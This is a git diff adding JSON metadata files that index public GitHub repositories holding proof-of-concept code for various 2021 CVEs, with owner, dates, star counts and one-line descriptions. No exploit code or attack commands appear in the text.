+ "pushed_at": "2024-05-13T15:21:54Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 810053844,
+ "name": "CVE-2021-31630",
+ "full_name": "junnythemarksman\/CVE-2021-31630",
+ "owner": {
+ "login": "junnythemarksman",
+ "id": 20056452,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20056452?v=4",
+ "html_url": "https:\/\/github.com\/junnythemarksman"
+ },
+ "html_url": "https:\/\/github.com\/junnythemarksman\/CVE-2021-31630",
+ "description": "Modified the PoC CVE-2021-31630 script by Fellipe Oliveira for HTB ",
+ "fork": false,
+ "created_at": "2024-06-04T00:44:47Z",
+ "updated_at": "2024-06-04T00:46:34Z",
+ "pushed_at": "2024-06-04T00:46:31Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 818448931,
+ "name": "cve-2021-31630",
+ "full_name": "adibabdala123\/cve-2021-31630",
+ "owner": {
+ "login": "adibabdala123",
+ "id": 76139191,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76139191?v=4",
+ "html_url": "https:\/\/github.com\/adibabdala123"
+ },
+ "html_url": "https:\/\/github.com\/adibabdala123\/cve-2021-31630",
+ "description": "This is a automation of cve-2021-31630 exploitation",
+ "fork": false,
+ "created_at": "2024-06-21T22:10:49Z",
+ "updated_at": "2024-06-21T23:01:21Z",
+ "pushed_at": "2024-06-21T23:01:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3164.json b/2021/CVE-2021-3164.json
new file mode 100644
index 0000000000..27ad3e8509
--- /dev/null
+++ b/2021/CVE-2021-3164.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 331173610,
+ "name": "cve-2021-3164",
+ "full_name": "rmccarth\/cve-2021-3164",
+ "owner": {
+ "login": "rmccarth",
+ "id": 36937649,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36937649?v=4",
+ "html_url": "https:\/\/github.com\/rmccarth"
+ },
+ "html_url": "https:\/\/github.com\/rmccarth\/cve-2021-3164",
+ "description": "Church Rota version 2.6.4 is vulnerable to authenticated remote code execution. The user does not need to have file upload permission in order to upload and execute an arbitrary file. The application is written primarily with PHP so we use PHP in our PoC ",
+ "fork": false,
+ "created_at": "2021-01-20T02:48:46Z",
+ "updated_at": "2021-10-16T06:43:27Z",
+ "pushed_at": "2021-01-20T02:49:27Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3166.json b/2021/CVE-2021-3166.json
new file mode 100644
index 0000000000..822d0f194c
--- /dev/null
+++ b/2021/CVE-2021-3166.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 567852588,
+ "name": "CVE-2021-3166",
+ "full_name": "kaisersource\/CVE-2021-3166",
+ "owner": {
+ "login": "kaisersource",
+ "id": 20024395,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20024395?v=4",
+ "html_url": "https:\/\/github.com\/kaisersource"
+ },
+ "html_url": "https:\/\/github.com\/kaisersource\/CVE-2021-3166",
+ "description": "Mastering CVE-2021-3166",
+ "fork": false,
+ "created_at": "2022-11-18T18:28:57Z",
+ "updated_at": "2022-11-18T18:28:57Z",
+ "pushed_at": "2022-11-18T18:33:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-31728.json b/2021/CVE-2021-31728.json
new file mode 100644
index 0000000000..578002c6d4
--- /dev/null
+++ b/2021/CVE-2021-31728.json
@@ -0,0 +1,36 @@
+[
+ {
+ "id": 364331767,
+ "name": "CVE-2021-31728",
+ "full_name": "irql\/CVE-2021-31728",
+ "owner": {
+ "login": "irql",
+ "id": 38012156,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38012156?v=4",
+ "html_url": "https:\/\/github.com\/irql"
+ },
+ "html_url": "https:\/\/github.com\/irql\/CVE-2021-31728",
+ "description": "vulnerability in zam64.sys, zam32.sys allowing ring 0 code execution. CVE-2021-31727 and CVE-2021-31728 public reference.",
+ "fork": false,
+ "created_at": "2021-05-04T17:15:58Z",
+ "updated_at": "2024-06-21T00:09:17Z",
+ "pushed_at": "2021-05-10T20:42:33Z",
+ "stargazers_count": 87,
+ "watchers_count": 87,
+ "has_discussions": false,
+ "forks_count": 24,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-31727",
+ "cve-2021-31728",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 24,
+ "watchers": 87,
+ "score": 0,
+ "subscribers_count": 5
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-31760.json b/2021/CVE-2021-31760.json
new file mode 100644
index 0000000000..a6e98e291d
--- /dev/null
+++ b/2021/CVE-2021-31760.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 359983710,
+ "name": "CVE-2021-31760",
+ "full_name": "Mesh3l911\/CVE-2021-31760",
+ "owner": {
+ "login": "Mesh3l911",
+ "id": 74990355,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74990355?v=4",
+ "html_url": "https:\/\/github.com\/Mesh3l911"
+ },
+ "html_url": "https:\/\/github.com\/Mesh3l911\/CVE-2021-31760",
+ "description": "Exploiting a Cross-site request forgery (CSRF) attack to get a Remote Command Execution (RCE) through the Webmin's running process feature",
+ "fork": false,
+ "created_at": "2021-04-21T00:09:54Z",
+ "updated_at": "2021-04-29T02:55:07Z",
+ "pushed_at": "2021-04-24T20:07:02Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 360287311,
+ "name": "CVE-2021-31760",
+ "full_name": "electronicbots\/CVE-2021-31760",
+ "owner": {
+ "login": "electronicbots",
+ "id": 37217081,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37217081?v=4",
+ "html_url": "https:\/\/github.com\/electronicbots"
+ },
+ "html_url": "https:\/\/github.com\/electronicbots\/CVE-2021-31760",
+ "description": "Exploiting a Cross-site request forgery (CSRF) attack to get a Remote Command Execution (RCE) through the Webmin's running process feature",
+ "fork": false,
+ "created_at": "2021-04-21T19:43:53Z",
+ "updated_at": "2022-12-05T03:51:06Z",
+ "pushed_at": "2021-04-24T22:06:53Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-31761.json b/2021/CVE-2021-31761.json
new file mode 100644
index 0000000000..b9915258d9
--- /dev/null
+++ b/2021/CVE-2021-31761.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 360288017,
+ "name": "CVE-2021-31761",
+ "full_name": "Mesh3l911\/CVE-2021-31761",
+ "owner": {
+ "login": "Mesh3l911",
+ "id": 74990355,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74990355?v=4",
+ "html_url": "https:\/\/github.com\/Mesh3l911"
+ },
+ "html_url": "https:\/\/github.com\/Mesh3l911\/CVE-2021-31761",
+ "description": "Exploiting a Reflected Cross-Site Scripting (XSS) attack to get a Remote Command Execution (RCE) through the Webmin's running process feature",
+ "fork": false,
+ "created_at": "2021-04-21T19:46:43Z",
+ "updated_at": "2022-11-11T20:17:25Z",
+ "pushed_at": "2021-04-24T20:08:12Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 360291163,
+ "name": "CVE-2021-31761",
+ "full_name": "electronicbots\/CVE-2021-31761",
+ "owner": {
+ "login": "electronicbots",
+ "id": 37217081,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37217081?v=4",
+ "html_url": "https:\/\/github.com\/electronicbots"
+ },
+ "html_url": "https:\/\/github.com\/electronicbots\/CVE-2021-31761",
+ "description": "Exploiting a Reflected Cross-Site Scripting (XSS) attack to get a Remote Command Execution (RCE) through the Webmin's running process feature",
+ "fork": false,
+ "created_at": "2021-04-21T20:00:09Z",
+ "updated_at": "2022-12-05T03:51:41Z",
+ "pushed_at": "2021-04-24T22:08:16Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-31762.json b/2021/CVE-2021-31762.json
new file mode 100644
index 0000000000..df5e08f94b
--- /dev/null
+++ b/2021/CVE-2021-31762.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 360292539,
+ "name": "CVE-2021-31762",
+ "full_name": "Mesh3l911\/CVE-2021-31762",
+ "owner": {
+ "login": "Mesh3l911",
+ "id": 74990355,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74990355?v=4",
+ "html_url": "https:\/\/github.com\/Mesh3l911"
+ },
+ "html_url": "https:\/\/github.com\/Mesh3l911\/CVE-2021-31762",
+ "description": "Exploiting a Cross-site request forgery (CSRF) attack to creat a new privileged user through the Webmin's add users feature",
+ "fork": false,
+ "created_at": "2021-04-21T20:06:09Z",
+ "updated_at": "2021-05-19T00:05:17Z",
+ "pushed_at": "2021-04-24T20:10:01Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 360294065,
+ "name": "CVE-2021-31762",
+ "full_name": "electronicbots\/CVE-2021-31762",
+ "owner": {
+ "login": "electronicbots",
+ "id": 37217081,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37217081?v=4",
+ "html_url": "https:\/\/github.com\/electronicbots"
+ },
+ "html_url": "https:\/\/github.com\/electronicbots\/CVE-2021-31762",
+ "description": "Exploiting a Cross-site request forgery (CSRF) attack to creat a new privileged user through the Webmin's add users feature ",
+ "fork": false,
+ "created_at": "2021-04-21T20:13:06Z",
+ "updated_at": "2023-09-28T11:27:02Z",
+ "pushed_at": "2021-04-24T22:05:36Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-31796.json b/2021/CVE-2021-31796.json
new file mode 100644
index 0000000000..ce2b6cc1a5
--- /dev/null
+++ b/2021/CVE-2021-31796.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 88706883,
+ "name": "CACredDecoder",
+ "full_name": "unmanarc\/CACredDecoder",
+ "owner": {
+ "login": "unmanarc",
+ "id": 7947734,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7947734?v=4",
+ "html_url": "https:\/\/github.com\/unmanarc"
+ },
+ "html_url": "https:\/\/github.com\/unmanarc\/CACredDecoder",
+ "description": "C-Ark Credential Decoder for #CVE-2021-31796",
+ "fork": false,
+ "created_at": "2017-04-19T06:01:08Z",
+ "updated_at": "2023-02-21T16:26:07Z",
+ "pushed_at": "2021-10-11T17:59:48Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-31800.json b/2021/CVE-2021-31800.json
new file mode 100644
index 0000000000..5b4d518b9b
--- /dev/null
+++ b/2021/CVE-2021-31800.json
@@ -0,0 +1,70 @@
+[
+ {
+ "id": 529954227,
+ "name": "CVE-2021-31800-Impacket-SMB-Server-Arbitrary-file-read-write",
+ "full_name": "p0dalirius\/CVE-2021-31800-Impacket-SMB-Server-Arbitrary-file-read-write",
+ "owner": {
+ "login": "p0dalirius",
+ "id": 79218792,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79218792?v=4",
+ "html_url": "https:\/\/github.com\/p0dalirius"
+ },
+ "html_url": "https:\/\/github.com\/p0dalirius\/CVE-2021-31800-Impacket-SMB-Server-Arbitrary-file-read-write",
+ "description": "A path traversal in smbserver.py allows an attacker to read\/write arbitrary files on the server.",
+ "fork": false,
+ "created_at": "2022-08-28T19:04:46Z",
+ "updated_at": "2023-06-03T03:56:18Z",
+ "pushed_at": "2023-01-19T11:06:33Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "arbitrary",
+ "cve-2021-31800",
+ "file",
+ "impacket",
+ "read",
+ "smbserver",
+ "write"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 531854393,
+ "name": "CVE-2021-31800",
+ "full_name": "Louzogh\/CVE-2021-31800",
+ "owner": {
+ "login": "Louzogh",
+ "id": 38815386,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38815386?v=4",
+ "html_url": "https:\/\/github.com\/Louzogh"
+ },
+ "html_url": "https:\/\/github.com\/Louzogh\/CVE-2021-31800",
+ "description": "CVE-2021-31800 POC",
+ "fork": false,
+ "created_at": "2022-09-02T09:02:19Z",
+ "updated_at": "2022-11-10T01:00:33Z",
+ "pushed_at": "2022-09-02T10:27:27Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-31805.json b/2021/CVE-2021-31805.json
new file mode 100644
index 0000000000..d630537ef8
--- /dev/null
+++ b/2021/CVE-2021-31805.json
@@ -0,0 +1,242 @@
+[
+ {
+ "id": 481804043,
+ "name": "s2-062",
+ "full_name": "pyroxenites\/s2-062",
+ "owner": {
+ "login": "pyroxenites",
+ "id": 75877299,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75877299?v=4",
+ "html_url": "https:\/\/github.com\/pyroxenites"
+ },
+ "html_url": "https:\/\/github.com\/pyroxenites\/s2-062",
+ "description": "远程代码执行S2-062 CVE-2021-31805验证POC",
+ "fork": false,
+ "created_at": "2022-04-15T01:50:14Z",
+ "updated_at": "2024-06-22T16:13:27Z",
+ "pushed_at": "2022-04-17T08:19:59Z",
+ "stargazers_count": 131,
+ "watchers_count": 131,
+ "has_discussions": false,
+ "forks_count": 54,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 54,
+ "watchers": 131,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 481835287,
+ "name": "CVE-2021-31805",
+ "full_name": "Wrin9\/CVE-2021-31805",
+ "owner": {
+ "login": "Wrin9",
+ "id": 54984589,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54984589?v=4",
+ "html_url": "https:\/\/github.com\/Wrin9"
+ },
+ "html_url": "https:\/\/github.com\/Wrin9\/CVE-2021-31805",
+ "description": "S2-062 (CVE-2021-31805) \/ S2-061 \/ S2-059 RCE",
+ "fork": false,
+ "created_at": "2022-04-15T04:23:44Z",
+ "updated_at": "2024-01-04T17:07:49Z",
+ "pushed_at": "2022-04-15T08:52:11Z",
+ "stargazers_count": 36,
+ "watchers_count": 36,
+ "has_discussions": false,
+ "forks_count": 13,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 13,
+ "watchers": 36,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 481922385,
+ "name": "Struts2_S2-062_CVE-2021-31805",
+ "full_name": "Axx8\/Struts2_S2-062_CVE-2021-31805",
+ "owner": {
+ "login": "Axx8",
+ "id": 34683107,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34683107?v=4",
+ "html_url": "https:\/\/github.com\/Axx8"
+ },
+ "html_url": "https:\/\/github.com\/Axx8\/Struts2_S2-062_CVE-2021-31805",
+ "description": "Apache Struts2 S2-062远程代码执行漏洞(CVE-2021-31805) | 反弹Shell",
+ "fork": false,
+ "created_at": "2022-04-15T10:28:29Z",
+ "updated_at": "2023-09-28T11:37:58Z",
+ "pushed_at": "2022-04-18T14:21:35Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 481937119,
+ "name": "S2-062",
+ "full_name": "jax7sec\/S2-062",
+ "owner": {
+ "login": "jax7sec",
+ "id": 102047728,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102047728?v=4",
+ "html_url": "https:\/\/github.com\/jax7sec"
+ },
+ "html_url": "https:\/\/github.com\/jax7sec\/S2-062",
+ "description": "Apache Struts2 S2-062远程代码执行漏洞(CVE-2021-31805) 支持批量扫描漏洞及漏洞利用",
+ "fork": false,
+ "created_at": "2022-04-15T11:30:26Z",
+ "updated_at": "2023-09-28T11:37:58Z",
+ "pushed_at": "2022-04-15T15:25:08Z",
+ "stargazers_count": 24,
+ "watchers_count": 24,
+ "has_discussions": false,
+ "forks_count": 13,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 13,
+ "watchers": 24,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 482013810,
+ "name": "CVE-2021-31805",
+ "full_name": "aeyesec\/CVE-2021-31805",
+ "owner": {
+ "login": "aeyesec",
+ "id": 61375985,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61375985?v=4",
+ "html_url": "https:\/\/github.com\/aeyesec"
+ },
+ "html_url": "https:\/\/github.com\/aeyesec\/CVE-2021-31805",
+ "description": " PoC for CVE-2021-31805 (Apache Struts2)",
+ "fork": false,
+ "created_at": "2022-04-15T16:09:52Z",
+ "updated_at": "2022-05-21T01:49:36Z",
+ "pushed_at": "2022-04-22T05:24:48Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 482736902,
+ "name": "CVE-2021-31805-POC",
+ "full_name": "fleabane1\/CVE-2021-31805-POC",
+ "owner": {
+ "login": "fleabane1",
+ "id": 58097248,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58097248?v=4",
+ "html_url": "https:\/\/github.com\/fleabane1"
+ },
+ "html_url": "https:\/\/github.com\/fleabane1\/CVE-2021-31805-POC",
+ "description": "Apache Struts2 S2-062(CVE-2021-31805)远程代码执行批量检测(无利用)",
+ "fork": false,
+ "created_at": "2022-04-18T06:17:59Z",
+ "updated_at": "2022-11-17T07:23:18Z",
+ "pushed_at": "2022-04-18T05:31:30Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 512460959,
+ "name": "CVE-2021-31805",
+ "full_name": "z92g\/CVE-2021-31805",
+ "owner": {
+ "login": "z92g",
+ "id": 108780847,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108780847?v=4",
+ "html_url": "https:\/\/github.com\/z92g"
+ },
+ "html_url": "https:\/\/github.com\/z92g\/CVE-2021-31805",
+ "description": "S2-061\/S2-062 Struts2 远程命令执行漏洞 POC&EXP",
+ "fork": false,
+ "created_at": "2022-07-10T14:48:52Z",
+ "updated_at": "2024-01-30T19:34:04Z",
+ "pushed_at": "2022-07-23T15:31:30Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 674477369,
+ "name": "CVE-2021-31805",
+ "full_name": "nth347\/CVE-2021-31805",
+ "owner": {
+ "login": "nth347",
+ "id": 20441996,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20441996?v=4",
+ "html_url": "https:\/\/github.com\/nth347"
+ },
+ "html_url": "https:\/\/github.com\/nth347\/CVE-2021-31805",
+ "description": "Vulnerable environment of CVE-2021-31805 (S2-062) for testing",
+ "fork": false,
+ "created_at": "2023-08-04T03:42:37Z",
+ "updated_at": "2023-08-04T03:46:31Z",
+ "pushed_at": "2023-08-04T03:46:00Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-31856.json b/2021/CVE-2021-31856.json
new file mode 100644
index 0000000000..51420f33c9
--- /dev/null
+++ b/2021/CVE-2021-31856.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 364492629,
+ "name": "CVE-2021-31856",
+ "full_name": "ssst0n3\/CVE-2021-31856",
+ "owner": {
+ "login": "ssst0n3",
+ "id": 16935049,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16935049?v=4",
+ "html_url": "https:\/\/github.com\/ssst0n3"
+ },
+ "html_url": "https:\/\/github.com\/ssst0n3\/CVE-2021-31856",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-05-05T07:18:26Z",
+ "updated_at": "2021-05-05T08:55:20Z",
+ "pushed_at": "2021-05-05T08:55:18Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-31862.json b/2021/CVE-2021-31862.json
new file mode 100644
index 0000000000..1522630aa1
--- /dev/null
+++ b/2021/CVE-2021-31862.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 422103769,
+ "name": "CVE-2021-31862",
+ "full_name": "RobertDra\/CVE-2021-31862",
+ "owner": {
+ "login": "RobertDra",
+ "id": 68341018,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68341018?v=4",
+ "html_url": "https:\/\/github.com\/RobertDra"
+ },
+ "html_url": "https:\/\/github.com\/RobertDra\/CVE-2021-31862",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-28T07:18:01Z",
+ "updated_at": "2022-02-17T10:12:18Z",
+ "pushed_at": "2021-11-01T12:56:12Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-31955.json b/2021/CVE-2021-31955.json
new file mode 100644
index 0000000000..86d4de9b59
--- /dev/null
+++ b/2021/CVE-2021-31955.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 380408979,
+ "name": "CVE-2021-31955-POC",
+ "full_name": "freeide\/CVE-2021-31955-POC",
+ "owner": {
+ "login": "freeide",
+ "id": 33774184,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33774184?v=4",
+ "html_url": "https:\/\/github.com\/freeide"
+ },
+ "html_url": "https:\/\/github.com\/freeide\/CVE-2021-31955-POC",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-06-26T03:59:38Z",
+ "updated_at": "2024-04-26T23:28:38Z",
+ "pushed_at": "2021-06-26T03:23:29Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 20,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 20,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-31956.json b/2021/CVE-2021-31956.json
new file mode 100644
index 0000000000..e26fef8914
--- /dev/null
+++ b/2021/CVE-2021-31956.json
@@ -0,0 +1,122 @@
+[
+ {
+ "id": 430644904,
+ "name": "CVE-2021-31956",
+ "full_name": "hzshang\/CVE-2021-31956",
+ "owner": {
+ "login": "hzshang",
+ "id": 18522752,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18522752?v=4",
+ "html_url": "https:\/\/github.com\/hzshang"
+ },
+ "html_url": "https:\/\/github.com\/hzshang\/CVE-2021-31956",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-11-22T09:37:46Z",
+ "updated_at": "2022-11-01T02:46:31Z",
+ "pushed_at": "2021-11-22T10:01:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 446889760,
+ "name": "CVE-2021-31956-EXP",
+ "full_name": "aazhuliang\/CVE-2021-31956-EXP",
+ "owner": {
+ "login": "aazhuliang",
+ "id": 48093339,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48093339?v=4",
+ "html_url": "https:\/\/github.com\/aazhuliang"
+ },
+ "html_url": "https:\/\/github.com\/aazhuliang\/CVE-2021-31956-EXP",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-11T16:03:38Z",
+ "updated_at": "2023-12-04T03:14:30Z",
+ "pushed_at": "2022-01-11T16:52:16Z",
+ "stargazers_count": 39,
+ "watchers_count": 39,
+ "has_discussions": false,
+ "forks_count": 28,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 28,
+ "watchers": 39,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 531882270,
+ "name": "CVE-2021-31956",
+ "full_name": "Y3A\/CVE-2021-31956",
+ "owner": {
+ "login": "Y3A",
+ "id": 62646606,
